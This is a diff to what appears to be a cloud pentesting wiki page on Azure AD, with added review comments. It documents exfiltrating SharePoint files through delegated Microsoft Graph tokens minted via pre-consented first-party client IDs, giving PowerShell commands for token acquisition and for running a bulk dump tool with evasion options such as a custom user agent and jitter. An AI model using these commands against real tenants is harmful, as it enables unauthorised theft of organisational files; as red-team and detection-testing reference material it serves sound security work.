59 changes: 59 additions & 0 deletions src/pentesting-cloud/azure-security/az-services/az-azuread.md
Expand Up @@ -1176,6 +1176,63 @@ Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
{{#endtab }}
{{#endtabs }}

## Microsoft Graph delegated SharePoint data exfiltration (SharePointDumper)

Attackers with a **delegated Microsoft Graph token** that includes **`Sites.Read.All`** or **`Sites.ReadWrite.All`** can enumerate **sites/drives/items** over Graph and then **pull file contents** via **SharePoint pre-authentication download URLs** (time-limited URLs embedding an access token). The [SharePointDumper](https://github.com/zh54321/SharePointDumper) script automates the full flow (enumeration → pre-auth downloads) and emits per-request telemetry for detection testing.

### Obtaining usable delegated tokens

- SharePointDumper itself **does not authenticate**; supply an access token (optionally refresh token).
- Pre-consented **first-party clients** can be abused to mint a Graph token without registering an app. Example `Invoke-Auth` (from [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)) invocations:

```powershell
# CAE requested by default; yields long-lived (~24h) access token
Import-Module ./EntraTokenAid/EntraTokenAid.psm1
$tokens = Invoke-Auth -ClientID 'b26aadf8-566f-4478-926f-589f601d9c74' -RedirectUrl 'urn:ietf:wg:oauth:2.0:oob' # OneDrive (FOCI TRUE)

# Other pre-consented clients
Invoke-Auth -ClientID '1fec8e78-bce4-4aaf-ab1b-5451cc387264' -RedirectUrl 'https://login.microsoftonline.com/common/oauth2/nativeclient' # Teams (FOCI TRUE)
Invoke-Auth -ClientID 'd326c1ce-6cc6-4de2-bebc-4591e5e13ef0' -RedirectUrl 'msauth://code/ms-sharepoint-auth%3A%2F%2Fcom.microsoft.sharepoint' # SharePoint (FOCI TRUE)
Invoke-Auth -ClientID '4765445b-32c6-49b0-83e6-1d93765276ca' -RedirectUrl 'https://scuprodprv.www.microsoft365.com/spalanding' -Origin 'https://doesnotmatter' # OfficeHome (FOCI FALSE)
Invoke-Auth -ClientID '08e18876-6177-487e-b8b5-cf950c1e598c' -RedirectUrl 'https://onedrive.cloud.microsoft/_forms/spfxsinglesignon.aspx' -Origin 'https://doesnotmatter' # SPO Web Extensibility (FOCI FALSE)
```

> [!NOTE]
> FOCI TRUE clients support refresh across devices; FOCI FALSE clients often require `-Origin` to satisfy reply URL origin validation.

### Running SharePointDumper for enumeration + exfiltration

- Basic dump with custom UA / proxy / throttling:

```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -UserAgent "Not SharePointDumper" -RequestDelaySeconds 2 -Variation 3 -Proxy 'http://127.0.0.1:8080'
```

- Scope control: include/exclude sites or extensions and global caps:

```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -IncludeSites 'Finance','Projects' -IncludeExtensions pdf,docx -MaxFiles 500 -MaxTotalSizeMB 100
```

- **Resume** interrupted runs (re-enumerates but skips downloaded items):

```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -Resume -OutputFolder .\20251121_1551_MyTenant
```

- **Automatic token refresh on HTTP 401** (requires EntraTokenAid loaded):

```powershell
Import-Module ./EntraTokenAid/EntraTokenAid.psm1
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -RefreshToken $tokens.refresh_token -RefreshClientId 'b26aadf8-566f-4478-926f-589f601d9c74'
```

Operational notes:

- Prefers **CAE-enabled** tokens to avoid mid-run expiry; refresh attempts are **not** logged in the tool’s API log.
- Generates **CSV/JSON request logs** for **Graph + SharePoint** and redacts embedded SharePoint download tokens by default (toggleable).
- Supports **custom User-Agent**, **HTTP proxy**, **per-request delay + jitter**, and **Ctrl+C-safe shutdown** for traffic shaping during detection/IR tests.

## Entra ID Privilege Escalation

{{#ref}}
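Review bot: the NOTE block after the `Invoke-Auth` examples ("FOCI TRUE clients support refresh across devices") misstates what FOCI means: Family of Client IDs lets a refresh token issued to one family member be redeemed for tokens for another family client; it says nothing about devices. Suggest rewording to "FOCI TRUE clients share a refresh token within Microsoft's family of client IDs" so the later `-RefreshClientId` example reads correctly. Two smaller points: only the first `Invoke-Auth` call is assigned to `$tokens`, yet every later `Invoke-SharePointDumper.ps1` call consumes `$tokens.access_token`, so either assign the other calls too or say only one is needed; and since the intro sells the CSV/JSON request logs as detection-testing telemetry, the "Operational notes" list should name the tenant-side sources a defender correlates them against (the Microsoft 365 unified audit log's SharePoint file-access events and the Graph request records), otherwise the telemetry claim has nothing to land on.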
Expand Down Expand Up @@ -1245,6 +1302,8 @@ The default mode is **Audit**:
## References

- [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
- [SharePointDumper](https://github.com/zh54321/SharePointDumper)
- [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)

{{#include ../../../banners/hacktricks-training.md}}

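Review bot: the two added reference entries use short link text (`[SharePointDumper](...)`, `[EntraTokenAid](...)`) while the existing entry on the line above repeats the full URL as its link text; pick one convention for the list, and since both tools are already linked inline in the new section, consider whether the list needs them twice.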